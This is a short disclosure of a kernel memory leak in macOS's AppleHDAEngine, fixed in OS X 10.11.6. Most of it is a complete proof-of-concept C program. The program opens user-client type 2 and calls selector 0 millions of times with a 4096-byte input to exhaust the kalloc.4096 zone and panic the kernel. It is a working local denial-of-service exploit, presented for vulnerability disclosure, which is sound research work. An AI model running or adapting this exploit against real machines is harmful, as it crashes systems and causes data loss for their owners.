DspFunc memory leak in AppleHDAEngine, fixed in OS X 10.11.6

See the PoC below. It opens user-client type 2 of the first AppleHDAEngine service and calls external method selector 0 in a tight loop with a 4096-byte input structure; according to the author each call leaks one allocation from the kernel's kalloc.4096 zone, so after enough iterations the kernel runs out of memory and panics. This is a local denial of service only — the PoC does not control any leaked memory — and it should obviously not be run on a machine you care about.

 

PoC

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <IOKit/IOKitLib.h>
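/*
 * PoC for the AppleHDAEngine user-client kernel memory leak fixed in
 * OS X 10.11.6.
 *
 * Opens user-client type 2 of the first AppleHDAEngine service found and
 * calls external method selector 0 repeatedly with a 0x1000-byte input
 * structure (sized to land in the kalloc.4096 zone).  The author's claim is
 * that every call leaks one such allocation; after enough iterations the
 * kernel exhausts memory and panics.  This is a denial-of-service PoC only:
 * nothing here controls the leaked memory.
 *
 * Usage: ./poc [iterations]
 *   iterations defaults to 30,000,000.  A smaller count lets you check the
 *   leak with zone statistics instead of waiting for the panic.
 *
 * Returns 0 if the loop completes without a panic, 1 on any IOKit setup or
 * argument error.  All IOKit objects are released on every exit path so the
 * PoC itself does not leak port rights in the user process.
 */
int main(int argc, char **argv)
{
    int rc = 1;
    kern_return_t err;
    io_iterator_t iterator = IO_OBJECT_NULL;
    io_service_t service = IO_OBJECT_NULL;
    io_connect_t conn = MACH_PORT_NULL;
    const uint32_t user_client_type = 2;  /* type passed to IOServiceOpen */
    const uint32_t selector = 0;          /* external method index */
    uint64_t iterations = 30000000ULL;

    if (argc > 1) {
        char *end = NULL;
        errno = 0;
        unsigned long long v = strtoull(argv[1], &end, 0);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "usage: %s [iterations]\n", argv[0]);
            return rc;
        }
        iterations = v;
    }

    /* IOServiceMatching returns NULL only when the dictionary could not be
     * allocated. */
    CFMutableDictionaryRef matching = IOServiceMatching("AppleHDAEngine");
    if (!matching) {
        printf("unable to create service matching dictionary\n");
        return rc;
    }

    /* IOServiceGetMatchingServices consumes the reference to 'matching'
     * whether or not it succeeds, so it is not released here. */
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS) {
        printf("no matches\n");
        return rc;
    }

    service = IOIteratorNext(iterator);
    if (service == IO_OBJECT_NULL) {
        printf("unable to find service\n");
        goto out_iterator;
    }

    err = IOServiceOpen(service, mach_task_self(), user_client_type, &conn);
    if (err != KERN_SUCCESS) {
        printf("unable to get user client connection\n");
        goto out_service;
    }
    /* Report the type actually used, rather than a hard-coded 0. */
    printf("got userclient connection: %x, type:%u\n", conn, (unsigned)user_client_type);

    uint64_t inputScalar[8] = {0};
    uint32_t inputScalarCnt = 0;
    char inputStruct[4096];
    uint64_t outputScalar[8] = {0};
    uint32_t outputScalarCnt = 0;
    char outputStruct[4096];
    size_t outputStructCnt = 4;

    /* Fill the input with a recognisable pattern.  Only the size (0x1000,
     * i.e. kalloc.4096) is believed to matter for the leak, not the bytes. */
    memset(inputStruct, 'a', sizeof inputStruct);
    inputStruct[sizeof inputStruct - 1] = '\0';

    printf("trying to leak memory of zone kalloc.4096\n");
    printf("please wait for few seconds.\n");

    for (uint64_t count = 0; count < iterations; count++) {
        if (count % 1000 == 0) {
            printf(". ");
            fflush(stdout); /* progress dots have no newline; show them before a panic */
        }
        /* Both output counts are in/out parameters that the kernel may
         * overwrite with the size actually returned; reset them so every
         * iteration issues an identical call. */
        outputScalarCnt = 0;
        outputStructCnt = 4;
        /* Return value deliberately ignored: the leak, not the result,
         * is the point, and the method may legitimately fail. */
        (void)IOConnectCallMethod(conn,
                                  selector,
                                  inputScalar,
                                  inputScalarCnt,
                                  inputStruct,
                                  sizeof inputStruct,
                                  outputScalar,
                                  &outputScalarCnt,
                                  outputStruct,
                                  &outputStructCnt);
    }
    printf("panic?\n");
    rc = 0;

    IOServiceClose(conn);
out_service:
    IOObjectRelease(service);
out_iterator:
    IOObjectRelease(iterator);
    return rc;
}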
